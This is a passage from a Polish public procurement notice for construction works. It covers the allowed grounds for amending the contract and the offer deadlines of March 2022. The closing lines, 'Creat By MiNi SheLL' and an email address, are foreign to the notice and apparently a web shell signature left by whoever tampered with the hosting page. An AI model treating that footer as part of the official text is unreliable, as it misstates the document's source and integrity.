okoliczności: <br/>1) wystąpiła zmiana dokonana na podstawie art. 23 pkt. 1 ustawy Prawo budowlane tj. zmiana w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;<br/>2) wystąpiła zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. b ustawy Prawo budowlane tj. uzgodniono możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;<br/>3) zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36 a ust. 5 ustawy Prawo budowlane i dokonane zostały zgodnie z zapisami art. 36 a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;<br/>4) wystąpiła zmiana terminu zakończenia wykonania przedmiotu zamówienia, która wynikła z okoliczności, których Zamawiający i Wykonawca nie mogli przewidzieć przed terminem składania ofert i nie jest przez nich zawiniona, w następujących przypadkach:<br/>a) wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania przedmiotu umowy;<br/>b) wystąpienia szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczną ;<br/>c) wystąpienia siły wyższej.<br/>5) w przypadku nieuzyskania przez Zamawiającego stosownych pozwoleń na realizację inwestycji drogowej;<br/>6) w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, których nie można było przewidzieć na etapie składania ofert Zamawiający dopuszcza zawarcie umów o podwykonawstwo na etapie realizacji umowy;<br/>7) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę:<br/>a) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, lub<br/>b) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1<br/>8) jeżeli dotyczy realizacji, przez dotychczasowego wykonawcę, dodatkowych dostaw, usług lub robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>9) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>3. Postanowienia określone w ust. 2 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią natomiast zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w formie elektronicznej lub w postaci elektronicznej jak opisano w rozdz. VIII SWZ, w terminie do dnia 16.03.2022 r. do godz. 10.00. Oferty złożona po terminie zostaną odrzucone przez Zamawiającego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> zgodnie z rozdz.XX SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com